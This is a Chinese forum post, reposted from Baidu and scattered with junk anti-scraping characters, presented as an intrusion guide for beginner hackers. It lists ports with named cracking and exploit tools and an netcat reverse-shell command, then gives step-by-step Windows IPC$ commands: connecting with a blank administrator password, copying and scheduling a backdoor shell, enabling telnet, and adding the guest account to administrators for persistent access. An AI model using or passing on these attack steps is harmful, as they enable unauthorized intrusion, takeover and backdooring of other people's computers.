TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu# a6 R" M! }' H9 z
希望对新手入侵有帮助!
3 Z" m y% a: h( R# O 1. 1433端口入侵
: [5 K+ o! \$ l& `3 x scanport.exe 查有1433的机器' ^/ c' J( x! `/ \2 J7 u
SQLScanPass.exe 进行字典暴破(字典是关键)* \ K* J( [. G0 D6 e
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。1 ]% U* L4 [% K% X
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
* d! q) k1 E+ O" \ (以上反向的,测试成功)
2 r' t: C i2 J" a; Y/ A sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
$ p- F- d" i/ ]' G 2. 4899端口入侵
/ Y9 p7 _$ J) w. o# j 用4899过滤器.exe,扫描空口令的机器
+ L }+ [. s! ]0 ] 3. 3899的入侵
% G( v8 @/ @% a" u3 w3 ?# u 对很早的机器,可以试试3389的溢出(win3389ex.exe)
0 |( G6 X1 ]% f& k 对2000的机器,可以试试字典暴破。(tscrack.exe)* C+ L' l% \, r3 i$ w* N" C
4. 80入侵6 ]6 b' ~1 U% O+ [1 L9 G0 B
对sp3以前的机器,可以用webdav入侵;
' a$ f- d/ t5 X 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)" v$ {3 E' M( h5 y, E
可以利用SQL进行注入。(啊D的注入软件)。8 c6 |) Z5 S' H2 s
5. serv-u入侵(21端口)8 P8 b! j6 A3 d3 B3 ~
对5. 004及以下系统,可用溢出入侵。(serv5004.exe), B. a* Z. M# r" T2 }& N
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
& C( w' k9 U) B2 z* E$ q 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
* W3 L, N$ q& U4 Q7 O Y3 G 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码3 Z; [1 v" V# g/ F5 N8 }- q
6. 554端口% e4 k, Q' N4 C" y
用real554.exe入侵。$ M+ t1 v! K" _
7. 6129端口/ f; Y- E) }6 R: y4 |2 g0 K5 k5 |
用DameWare6129.exe入侵。, F" l. b. N5 N6 b
8. 系统漏洞
. ^5 d; b% N. K E; S2 v/ S0 m# T 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。3 S b" J* L' m9 A; k9 r
9. 3127等端口* v5 K I& b4 ^5 S+ @
9 S+ f6 r9 I# W4 v1 N- ]! |; }. Y 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。) c8 N8 c0 E" @- h
10. 其他入侵; Q# y2 B9 I7 x2 {! Z, B' h7 J
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。5 L; [6 m" G% a/ a6 n' j- C
# B8 V0 v6 n- a5 Y5 ~
经典IPC$入侵( \: u# j: s3 Q! J. Z3 z
+ Z9 R; r5 u' @* K& a
1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"
2 ]/ e& m& c) O% [; a) ~ 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
, q6 k& `1 _+ h. W% ?* } 2. C:\>copy srv.exe $">\\127.0.0.1\admin$& V- m% S! {1 s1 j
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
8 Q, M6 ]7 {/ P* O, w& ?# b& j3 G 3. C:\>net time file://127.0.0.1/
% f" Z1 V/ e' l: z N( H, X 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
9 `' f# W: `- }" O! A6 G0 o6 @ 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
$ o- Q' g# ]9 v% T: ], k! ]0 z. j 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
" ]" u- H0 B/ X o% n; K- A' J 5. C:\>net time file://127.0.0.1/
8 H4 o" A0 G r9 L9 x 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。: `$ L0 `1 d! V& s7 A
6. C:\>telnet 127.0.0.1 99$ X* P( z0 n. D2 N
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。8 h1 D- m$ [# o' H7 @* I
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了2 p2 m- I! r! @/ K
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$2 N" V, q" o0 a% s2 t& z2 u9 X/ W I' G
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。. ^2 p8 c- }; ]
8. C:\WINNT\system32>ntlm! s9 d3 W% w7 \; Y# p
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!7 S* A) S1 Q. o( E: k* n
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组1 s* U1 j. F* N
10. C:\>net user guest /active:yes
9 P/ D1 h7 I+ y. |) n 将对方的Guest用户激活% q+ q3 z% a! T4 J* \/ A# x
11. C:\>net user guest 1234( Q- t7 R2 K9 g$ c0 Z3 }: M
将Guest的密码改为1234,或者你要设定的密码# n% K4 |4 d3 y! @" [6 N a
12. C:\>net localgroup administrators guest /add5 z0 ]0 h3 t' H* R! k/ j
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|